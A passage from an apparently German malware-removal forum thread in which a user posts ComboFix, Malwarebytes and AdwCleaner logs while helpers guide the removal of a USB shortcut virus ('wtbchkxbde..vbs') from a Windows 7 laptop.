Date: 2014-03-01 13:30:45.600 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2014-03-01 13:30:33.518 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2014-03-01 13:25:21.861 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2014-03-01 12:27:05.166 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2014-02-28 14:14:30.022 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2014-02-28 14:14:25.270 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. 
==================== Memory info =========================== Percentage of memory in use: 51% Total physical RAM: 3764.43 MB Available physical RAM: 1835.11 MB Total Pagefile: 7526.99 MB Available Pagefile: 4673.9 MB Total Virtual: 8192 MB Available Virtual: 8191.82 MB ==================== Drives ================================ Drive c: (ACER) (Fixed) (Total:452.97 GB) (Free:30.45 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 466 GB) (Disk ID: 59D459D4) Partition 1: (Not Active) - (Size=13 GB) - (Type=27) Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=453 GB) - (Type=07 NTFS) ==================== End Of Log ============================ |
15.04.2014, 10:29 | #4 |
/// the machine /// TB trainer | Flash Drive Shortcut Virus wtbchkxbde..vbs
Plug the sticks in and do not unplug them again.
Panda USB Vaccine - Download - Filepony
Run that to secure the stick.
Scan with Combofix
__________________ Regards, schrauber Proud Member of UNITE and ASAP since 2009 No help via PM! |
16.04.2014, 08:41 | #5 |
| Flash Drive Shortcut Virus wtbchkxbde..vbs combofix.txt: Code:
ComboFix 14-04-12.01 - Franz 16.04.2014 2:59.1.4 - x64
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.49.1031.18.3764.1845 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
* Neuer Wiederherstellungspunkt wurde erstellt
.
.
(((((((((((((((((((((((((((((((((((( Weitere Löschungen ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Franz\AppData\Local\Microsoft\Windows\Temporary Internet Files\{4270F4AC-2AD7-488D-8E81-BDC8F71DD41B}.xps
c:\windows\Temp\log.txt
c:\windows\wininit.ini
.
.
((((((((((((((((((((((( Dateien erstellt von 2014-03-16 bis 2014-04-16 ))))))))))))))))))))))))))))))
.
.
2014-04-16 01:14 . 2014-04-16 01:14 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-04-16 00:52 . 2014-04-16 00:52 -------- d-----w- c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52 -------- d-----w- c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-14 08:45 -------- d-----w- C:\FRST
2014-04-07 07:32 . 2014-04-09 08:19 -------- d-----w- C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30 -------- d-----w- c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54 -------- d-----w- c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19 -------- d-----w- c:\programdata\Norton
2014-04-01 02:51 . 2013-09-22 15:47 73266 --sha-w- c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-01 02:51 . 2013-09-22 15:47 73266 ----a-w- c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 07:40 . 2014-03-25 07:40 -------- d-----w- C:\found.001
2014-03-21 05:44 . 2014-03-23 23:36 -------- d-----w- c:\users\Franz\AppData\Local\Microsoft Games
.
.
.
(((((((((((((((((((((((((((((((((((( Find3M Bericht ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37 22240 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
(((((((((((((((((((((((((((( Autostartpunkte der Registrierung ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x] R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x] R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x] R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x] R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x] R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x] R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x] R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x] R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x] R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x] R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x] R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x] R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x] R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x] R3 
WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x] S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x] S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x] S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x] S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x] S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x] S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x] S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x] S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x] S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x] S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x] S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x] S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x] S3 HECIx64;Intel(R) Management Engine 
Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x] S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x] S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x] S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x] . . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}] 2014-04-02 06:02 1150280 ----a-w- c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe . Inhalt des "geplante Tasks" Ordners . 2014-04-15 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09] . 2014-04-16 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09] . . --------- X64 Entries ----------- . . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1] @="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2] @="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll . 
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3] @="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4] @="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll . [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584] "IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424] "HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192] "Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720] "RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320] "RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600] "AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376] "AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464] "Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648] "Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160] "BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144] "wtbchkxbde"="wscript.exe" [2009-07-14 168960] . ------- Zusätzlicher Suchlauf ------- . 
uStart Page = hxxp://www.google.com.ph/intl/en/ uLocal Page = c:\windows\system32\blank.htm mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 mLocal Page = c:\windows\SysWOW64\blank.htm uInternet Settings,ProxyOverride = *.local IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105 IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000 TCP: DhcpNameServer = 172.20.10.1 . - - - - Entfernte verwaiste Registrierungseinträge - - - - . Toolbar-Locked - (no file) Wow6432Node-HKLM-Run-<NO NAME> - (no file) Toolbar-Locked - (no file) HKLM-Run-mwlDaemon - c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe . . . --------------------- Gesperrte Registrierungsschluessel --------------------- . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}] @Denied: (A 2) (Everyone) @="FlashBroker" "LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation] "Enabled"=dword:00000001 . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32] @="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib] @="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}] @Denied: (A 2) (Everyone) @="Shockwave Flash Object" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32] @="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx" "ThreadingModel"="Apartment" . 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus] @="0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID] @="ShockwaveFlash.ShockwaveFlash.10" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32] @="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib] @="{D27CDB6B-AE6D-11cf-96B8-444553540000}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version] @="1.0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID] @="ShockwaveFlash.ShockwaveFlash" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}] @Denied: (A 2) (Everyone) @="Macromedia Flash Factory Object" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32] @="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx" "ThreadingModel"="Apartment" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID] @="FlashFactory.FlashFactory.1" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32] @="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib] @="{D27CDB6B-AE6D-11cf-96B8-444553540000}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version] @="1.0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID] @="FlashFactory.FlashFactory" . 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}] @Denied: (A 2) (Everyone) @="IFlashBroker3" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32] @="{00020424-0000-0000-C000-000000000046}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib] @="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" "Version"="1.0" . [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security] @Denied: (Full) (Everyone) . Zeit der Fertigstellung: 2014-04-16 03:42:26 ComboFix-quarantined-files.txt 2014-04-16 01:42 . Vor Suchlauf: 15 Verzeichnis(se), 30.584.696.832 Bytes frei Nach Suchlauf: 24 Verzeichnis(se), 33.646.391.296 Bytes frei . - - End Of File - - 7B368FD47A4B13E2B05BF79FBA8C7373 |
16.04.2014, 19:25 | #6 |
/// the machine /// TB trainer | Flash Drive Shortcut Virus wtbchkxbde..vbs Please download Malwarebytes Anti-Malware.
Please download AdwCleaner to your desktop.
Please close your security software to avoid possible conflicts.
And a fresh FRST log, please. |
16.04.2014, 23:18 | #7 |
| Flash Drive Shortcut Virus wtbchkxbde..vbs OK, all done. mbam found nothing. mbam.txt: Code:
Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlauf Datum: 16.04.2014
Suchlauf-Zeit: 23:35:03
Logdatei: mbam.txt
Administrator: Ja

Version: 2.00.1.1004
Malware Datenbank: v2014.04.16.10
Rootkit Datenbank: v2014.03.27.01
Lizenz: Kostenlos
Malware Schutz: Deaktiviert
Bösartiger Webseiten Schutz: Deaktiviert
Chameleon: Deaktiviert

Betriebssystem: Windows 7
CPU: x64
Dateisystem: NTFS
Benutzer: Franz

Suchlauf-Art: Bedrohungs-Suchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 260376
Verstrichene Zeit: 24 Min, 16 Sek

Speicher: Aktiviert
Autostart: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Shuriken: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0 (No malicious items detected)
Module: 0 (No malicious items detected)
Registrierungsschlüssel: 0 (No malicious items detected)
Registrierungswerte: 0 (No malicious items detected)
Registrierungsdaten: 0 (No malicious items detected)
Ordner: 0 (No malicious items detected)
Dateien: 0 (No malicious items detected)
Physische Sektoren: 0 (No malicious items detected)
(end)

AdwCleaner[S1].txt: Code:
# AdwCleaner v3.023 - Bericht erstellt am 16/04/2014 um 23:59:49
# Aktualisiert 01/04/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium (64 bits)
# Benutzername : Franz - FRANZ-PC
# Gestartet von : C:\Users\Franz\Desktop\Antivir\Trojanerboard\adwcleaner.exe
# Option : Löschen

***** [ Dienste ] *****

***** [ Dateien / Ordner ] *****

***** [ Verknüpfungen ] *****

***** [ Registrierungsdatenbank ] *****

***** [ Browser ] *****

-\\ Internet Explorer v9.0.8112.16476

-\\ Google Chrome v33.0.1750.154

[ Datei : C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [1798 octets] - [11/03/2014 17:56:10]
AdwCleaner[R1].txt - [923 octets] - [16/04/2014 23:41:47]
AdwCleaner[S0].txt - [1811 octets] - [11/03/2014 17:57:23]
AdwCleaner[S1].txt - [845 octets] - [16/04/2014 23:59:49]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [904 octets] ##########

AdwCleaner[S0].txt: Code:
# AdwCleaner v3.021 - Bericht erstellt am 11/03/2014 um 16:57:23
# Aktualisiert 10/03/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium (64 bits)
# Benutzername : Franz - FRANZ-PC
# Gestartet von : C:\Downloads\Chrome\adwcleaner_3.021.exe
# Option : Löschen

***** [ Dienste ] *****

***** [ Dateien / Ordner ] *****

Ordner Gelöscht : C:\ProgramData\Partner
Ordner Gelöscht : C:\ProgramData\Tarma Installer
Ordner Gelöscht : C:\Users\Franz\AppData\Local\Temp\boost_interprocess

***** [ Verknüpfungen ] *****

***** [ Registrierungsdatenbank ] *****

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1AD27395-1659-4DFF-A319-2CFA243861A5}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Schlüssel Gelöscht : HKCU\Software\InstallCore
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Tarma Installer

***** [ Browser ] *****

-\\ Internet Explorer v9.0.8112.16476

-\\ Google Chrome v33.0.1750.146

[ Datei : C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [1798 octets] - [11/03/2014 16:56:10]
AdwCleaner[S0].txt - [1663 octets] - [11/03/2014 16:57:23]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1723 octets] ##########

jrt.txt: Code:
